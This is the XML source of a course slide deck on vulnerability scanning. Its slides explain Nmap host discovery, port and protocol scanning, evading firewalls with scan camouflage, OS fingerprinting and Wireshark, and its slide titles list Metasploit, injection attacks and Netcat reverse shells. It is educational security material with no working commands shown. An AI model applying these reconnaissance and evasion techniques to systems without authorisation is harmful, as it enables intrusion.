              <a:t>    received.</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If it receives any response then Nmap assumes the host has </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   responded and it is live.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>If it receives nothing, the host is assumed to not be live, not </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   currently on the network, or ignoring connections to the target </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   port.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Scan for TCP Ports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The basic method of TCP port scanning is to call a TCP connect </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   function for the port and wait for a response. This is called “TCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   connect” because it is based on the Unix system function used for </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   network communications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The connect function conducts the TCP three-way handshake and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   try to establish a connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   The table given below represents the possible assumptions made by </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   nmap after getting the reply for various requests.</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Scan for UDP Ports</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Scanning for UDP services is more error-prone than scanning for </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   TCP services.</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Scan for Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>This is used to identify whether a port is supporting a particular </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   type of protocol or not.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   For example if we make an attempt to connect to a UDP port the </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   following conclusion can be obtained.</a:t>
            </a:r>
          </a:p>
          <a:p>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Camouflage the Scan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Nmap includes options that hide its scanning process from </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   network security and monitoring devices like firewall.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OPEN PORT / SERVICE IDENTIFICATION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ports are an integral part of the Internet's communication model. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>They are the channel through which applications on the client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   computer can reach the software on the server. </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Identify a Target’s Operating System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>One of Nmap’s most useful features is the capability to determine a </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   host’s operating system based on its responses to specific packets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Depending on the operating system(OS), Nmap may even provide a </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   particular version and patch level information.</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Nmap Scripting Engine (NSE)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>It is one of Nmap's most powerful and flexible features.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>It allows users to write their own codes to automate a wide variety </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>   of networking tasks.</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Wireshark</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named Ethereal, the project was renamed Wireshark in May 2006 due to trademark issues.</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Functionality</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Wireshark is very similar to tcpdump, but has a graphical front-end and integrated sorting and filtering options.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Wireshark lets the user put network interface controllers into promiscuous mode (if supported by the network interface controller), so they can see all the traffic visible on that interface including unicast traffic not sent to that network interface controller's MAC address.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> However, when capturing with a packet analyzer in promiscuous mode on a port on a network switch, not all traffic through the switch is necessarily sent to the port where the capture is done, so capturing in promiscuous mode is not necessarily sufficient to see all network traffic. Port mirroring or various network taps extend capture to any point on the network. </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Features</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Data can be captured "from the wire" from a live network connection or read from a file of already-captured packets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Live data can be read from different types of networks, including Ethernet, IEEE 802.11, PPP, and loopback.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Captured network data can be browsed via a GUI, or via the terminal (command line) version of the utility, TShark.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Captured files can be programmatically edited or converted via command-line switches to the "editcap" program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Data display can be refined using a display filter.</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Plug-ins can be created for dissecting new protocols.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>VoIP calls in the captured traffic can be detected. If encoded in a compatible encoding, the media flow can even be played.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Raw USB traffic can be captured.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Wireless connections can also be filtered as long as they traverse the monitored Ethernet.[clarification needed]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Various settings, timers, and filters can be set to provide the facility of filtering the output of the captured traffic.</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Thank you</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69848" y="2090928"/>
            <a:ext cx="10058400" cy="4050792"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ports  are  an  integral  part  of  the  Internet's  communication  model. They  are  the  channel  through  which  applications  on  the  client computer can reach the software on the server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The  design  and  operation  of  the  Internet  is  based  on  the  Internet Protocol Suite, commonly also called TCP/IP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Network  services  are  referenced  using  two  components -a  host address and a port number.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>There are 65536 distinct and usable port numbers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Some examples of service ports used are HTTP(port 80), FTP(port 21), and SMTP(port 25), telnet(port 23) etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{4BECB6BD-AE08-343F-3B9F-0AA30F3CEC89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069848" y="484632"/>
            <a:ext cx="10058400" cy="1609344"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cont</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> …	</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xmlns=""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37</TotalTime>
  <Words>4780</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>443</Paragraphs>
  <Slides>86</Slides>
  <Notes>0</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>Theme</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>1</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Slide Titles</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>86</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="87" baseType="lpstr">
      <vt:lpstr>Wood Type</vt:lpstr>
      <vt:lpstr>Overview of Vulnerability Scanning</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Vulnerability</vt:lpstr>
      <vt:lpstr>Vulnerability</vt:lpstr>
      <vt:lpstr>Classifications of Vulnerability scanners</vt:lpstr>
      <vt:lpstr>Benefits of Vulnerability Scanners </vt:lpstr>
      <vt:lpstr>Limitations of Vulnerability Scanners</vt:lpstr>
      <vt:lpstr>OPEN PORT / SERVICE IDENTIFICATION</vt:lpstr>
      <vt:lpstr>Cont … </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Banner/version check</vt:lpstr>
      <vt:lpstr>WHAT IS BANNER?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Banner grabbing</vt:lpstr>
      <vt:lpstr>Traffic prob</vt:lpstr>
      <vt:lpstr>Need for Traffic probe</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Example </vt:lpstr>
      <vt:lpstr>Vulnerability probe</vt:lpstr>
      <vt:lpstr>Vulnerability probe…</vt:lpstr>
      <vt:lpstr>Vulnerability</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Vulnerability Probe</vt:lpstr>
      <vt:lpstr>Vulnerability Examples</vt:lpstr>
      <vt:lpstr>OS command injection</vt:lpstr>
      <vt:lpstr>HTML injection</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>Buffer overflow</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>OPENVAS</vt:lpstr>
      <vt:lpstr>Architecture of OpenVAS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Services Components</vt:lpstr>
      <vt:lpstr>Data Components </vt:lpstr>
      <vt:lpstr>Benefits of OpenVAS</vt:lpstr>
      <vt:lpstr>Limitations of OpenVAS</vt:lpstr>
      <vt:lpstr>METASPLOIT</vt:lpstr>
      <vt:lpstr>Functioning of Metasploit</vt:lpstr>
      <vt:lpstr>Penetration Testing</vt:lpstr>
      <vt:lpstr>IDS Signature Development</vt:lpstr>
      <vt:lpstr>Exploit Research</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Meterpreter </vt:lpstr>
      <vt:lpstr>NETWORKS VULNERABILITY SCANNING</vt:lpstr>
      <vt:lpstr>Cont…</vt:lpstr>
      <vt:lpstr>Need of Vulnerability Scanner </vt:lpstr>
      <vt:lpstr> Netcat</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Uses of Netcat</vt:lpstr>
      <vt:lpstr>Data Transfer</vt:lpstr>
      <vt:lpstr>Perform Basic Port Scanning</vt:lpstr>
      <vt:lpstr>Relays </vt:lpstr>
      <vt:lpstr>Create a backdoor</vt:lpstr>
      <vt:lpstr>Reverse Shells</vt:lpstr>
      <vt:lpstr>Obtain Remote Access to a Shell</vt:lpstr>
      <vt:lpstr>UNDERSTANDING PORT AND SERVICES TOOLS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Port forwarding or redirecting tools</vt:lpstr>
      <vt:lpstr>Datapipe</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Fpipe</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>NETWORK RECONNAISSANCE</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Nmap</vt:lpstr>
      <vt:lpstr>Nmap - Typical Features</vt:lpstr>
      <vt:lpstr>Identify Hosts on the Network</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Scan for TCP Ports</vt:lpstr>
      <vt:lpstr>Scan for UDP Ports</vt:lpstr>
      <vt:lpstr>Scan for Protocols</vt:lpstr>
      <vt:lpstr>Camouflage the Scan</vt:lpstr>
      <vt:lpstr>Identify a Target’s Operating System</vt:lpstr>
      <vt:lpstr>The Nmap Scripting Engine (NSE)</vt:lpstr>
      <vt:lpstr>Wireshark</vt:lpstr>
      <vt:lpstr>Functionality</vt:lpstr>
      <vt:lpstr>Features</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Vulnerability Scanning</dc:title>
  <dc:creator/>
  <cp:lastModifiedBy>Rakshith Bairi</cp:lastModifiedBy>
  <cp:revision>81</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-01T12:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-01T12:19:03Z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DE724ACC55134D418C164012D600B31A</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-11.2.0.11440</vt:lpwstr>
  </property>
</Properties>
</file>